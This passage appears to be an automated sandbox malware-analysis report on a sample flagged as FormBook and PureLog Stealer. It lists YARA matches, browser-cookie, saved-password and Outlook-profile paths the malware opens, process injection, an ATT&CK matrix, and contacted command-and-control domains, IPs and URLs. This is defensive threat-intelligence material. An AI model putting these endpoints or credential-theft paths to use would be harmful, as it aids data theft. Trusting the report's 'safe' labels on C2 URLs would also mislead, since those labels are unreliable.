                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 3.2.dGHiTqj3AB.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.dGHiTqj3AB.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 0.2.dGHiTqj3AB.exe.72b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.dGHiTqj3AB.exe.2cf513c.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1754732124.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1757860800.00000000072B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\SysWOW64\mcbuilder.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\SysWOW64\mcbuilder.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                  Remote Access Functionality

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 3.2.dGHiTqj3AB.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.dGHiTqj3AB.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 0.2.dGHiTqj3AB.exe.72b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.dGHiTqj3AB.exe.2cf513c.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1754732124.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1757860800.00000000072B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                  DLL Side-Loading                  		412
                  Process Injection                  		1
                  Masquerading                  		1
                  OS Credential Dumping                  		121
                  Security Software Discovery                  		Remote Services1
                  Email Collection                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  Abuse Elevation Control Mechanism                  		1
                  Disable or Modify Tools                  		LSASS Memory2
                  Process Discovery                  		Remote Desktop Protocol11
                  Archive Collected Data                  		3
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		41
                  Virtualization/Sandbox Evasion                  		Security Account Manager41
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin Shares1
                  Data from Local System                  		4
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture4
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                  Deobfuscate/Decode Files or Information                  		LSA Secrets2
                  File and Directory Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Abuse Elevation Control Mechanism                  		Cached Domain Credentials113
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                  Obfuscated Files or Information                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                  Software Packing                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  DLL Side-Loading                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483009 Sample: dGHiTqj3AB.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 33 www.theiconsummit.life 2->33 35 www.hourglasspoise.net 2->35 37 11 other IPs or domains 2->37 45 Malicious sample detected (through community Yara rule) 2->45 47 Yara detected PureLog Stealer 2->47 49 Yara detected FormBook 2->49 51 5 other signatures 2->51 10 dGHiTqj3AB.exe 3 2->10         started        signatures3 process4 file5 31 C:\Users\user\AppData\...\dGHiTqj3AB.exe.log, ASCII 10->31 dropped 65 Injects a PE file into a foreign processes 10->65 14 dGHiTqj3AB.exe 10->14         started        17 dGHiTqj3AB.exe 10->17         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 19 fgebfePlJm.exe 14->19 injected process9 signatures10 53 Found direct / indirect Syscall (likely to bypass EDR) 19->53 22 mcbuilder.exe 13 19->22         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 22->55 57 Tries to harvest and steal browser information (history, passwords, etc) 22->57 59 Modifies the context of a thread in another process (thread injection) 22->59 61 3 other signatures 22->61 25 fgebfePlJm.exe 22->25 injected 29 firefox.exe 22->29         started        process13 dnsIp14 39 www.lontos.top 203.161.42.162, 49756, 49757, 49758 VNPT-AS-VNVNPTCorpVN Malaysia 25->39 41 asymtos.tech 217.160.164.240, 49752, 49753, 49754 ONEANDONE-ASBrauerstrasse48DE Germany 25->41 43 3 other IPs or domains 25->43 63 Found direct / indirect Syscall (likely to bypass EDR) 25->63 signatures15

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  dGHiTqj3AB.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.fontbureau.com/designersG0%URL Reputationsafe
                  http://www.fontbureau.com/designers/?0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.fontbureau.com/designers?0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  http://www.fontbureau.com/designers0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.fonts.com0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
                  http://www.fontbureau.com0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.fontbureau.com/designers80%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                  http://www.hourglasspoise.net/5gvb/?r4HtI=inDHeTS0D6JHi&bPD=/cc9D7vqfViixqGthyicdvN6zULLmywOC8ezpB4FmcTpRtjTbyPN+qyyn2oVZVAAZJsSw+aEzq+oGUOxhiKfxK7cUWDoBkvPGfZgrhOxmX7AStJyIMBk2Ik=0%Avira URL Cloudsafe
                  http://www.asymtos.tech/34b9/?bPD=W6RiSnxSk7sWUyAWv8iRSiD0PbjPvpVwUriP78iMWJLg9pjq2qbXqPDPIc9Rf4jTN/ETygayReM86N3bYDrSkNDIFOCHTFVOdGC1q9B2gGW6d9vv3KfEEgs=&r4HtI=inDHeTS0D6JHi0%Avira URL Cloudsafe
                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                  http://www.accessoriestechbd.com/5pdf/0%Avira URL Cloudsafe
                  http://www.accessoriestechbd.com0%Avira URL Cloudsafe
                  http://www.asymtos.tech/34b9/0%Avira URL Cloudsafe
                  https://asymtos.ai/34b9/?bPD=W6RiSnxSk7sWUyAWv8iRSiD0PbjPvpVwUriP78iMWJLg9pjq2qbXqPDPIc9Rf4jTN/ETyga0%Avira URL Cloudsafe
                  http://www.theiconsummit.life/6fdz/0%Avira URL Cloudsafe
                  https://www.bosonserver.net/x10g/?bPD=AtIpZIbrclbIO3wVVorP/0%Avira URL Cloudsafe
                  http://www.lontos.top/ukrf/0%Avira URL Cloudsafe
                  http://www.accelbusiness.net/sg0d/?r4HtI=inDHeTS0D6JHi&bPD=ZFII8SVAvGzgMmVXT4ZY+5svGFARRAPMY6hEAWMgzd/rbIPLPNZ+nr66isGJwkaWRyig0DUujo2cMsRd49nDMp6VdguE/ogC4VFXU40D/gpWgkUbHmnCm4E=0%Avira URL Cloudsafe
                  http://www.hourglasspoise.net/5gvb/0%Avira URL Cloudsafe
                  http://www.bosonserver.net/x10g/?bPD=AtIpZIbrclbIO3wVVorP/+4YW7XwgThFYZcx/yn27KMXet/sCHbTQiCzWIx6Kv/NnE9nJScnuF31JPyJpxVQ15qsd8YhwJ4GP0n6fMl4YdtRcYZTZezTcHY=&r4HtI=inDHeTS0D6JHi0%Avira URL Cloudsafe
                  http://www.accessoriestechbd.com/5pdf/?r4HtI=inDHeTS0D6JHi&bPD=Ej/EzQPepC1y7H/CB3fFjxmxT5K/uokQyhXQpBVK3nqnb8oYKZIShVAN8OJA1iYy8omWkznWlYUMQWoQrGGIZe4YpIxUtk1QZkVuvgrHNfuUWu/hH7rCDC0=0%Avira URL Cloudsafe
                  http://www.bosonserver.net/x10g/0%Avira URL Cloudsafe
                  http://www.theiconsummit.life/6fdz/?bPD=Oie1FXKEyOqxuNWWyzkYdPfZReRkcG0Z1Eay2KtVdEC34I4dz//PHzzr4ve1tSfSRt9M/nPWu6bDrMp0Hm7HeQWrGZPcmCLmPnl5GlJrMre+ojzyhGOYA5A=&r4HtI=inDHeTS0D6JHi0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  accessoriestechbd.com
                  		103.29.180.74
                  		truefalse
                    		unknown
                    www.lontos.top
                    		203.161.42.162
                    		truefalse
                      		unknown
                      hourglasspoise.net
                      		3.33.130.190
                      		truefalse
                        		unknown
                        accelbusiness.net
                        		3.33.130.190
                        		truefalse
                          		unknown
                          bosonserver.net
                          		195.200.3.58
                          		truefalse
                            		unknown
                            theiconsummit.life
                            		3.33.130.190
                            		truefalse
                              		unknown
                              asymtos.tech
                              		217.160.164.240
                              		truefalse
                                		unknown
                                www.hourglasspoise.net
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.theiconsummit.life
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.asymtos.tech
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.accessoriestechbd.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.bosonserver.net
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.accelbusiness.net
                                          		unknown
                                          		unknowntrue
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.accessoriestechbd.com/5pdf/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.hourglasspoise.net/5gvb/?r4HtI=inDHeTS0D6JHi&bPD=/cc9D7vqfViixqGthyicdvN6zULLmywOC8ezpB4FmcTpRtjTbyPN+qyyn2oVZVAAZJsSw+aEzq+oGUOxhiKfxK7cUWDoBkvPGfZgrhOxmX7AStJyIMBk2Ik=false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.asymtos.tech/34b9/?bPD=W6RiSnxSk7sWUyAWv8iRSiD0PbjPvpVwUriP78iMWJLg9pjq2qbXqPDPIc9Rf4jTN/ETygayReM86N3bYDrSkNDIFOCHTFVOdGC1q9B2gGW6d9vv3KfEEgs=&r4HtI=inDHeTS0D6JHifalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.asymtos.tech/34b9/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.theiconsummit.life/6fdz/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.lontos.top/ukrf/false
                                            • Avira URL Cloud: safe
                                            		unknown
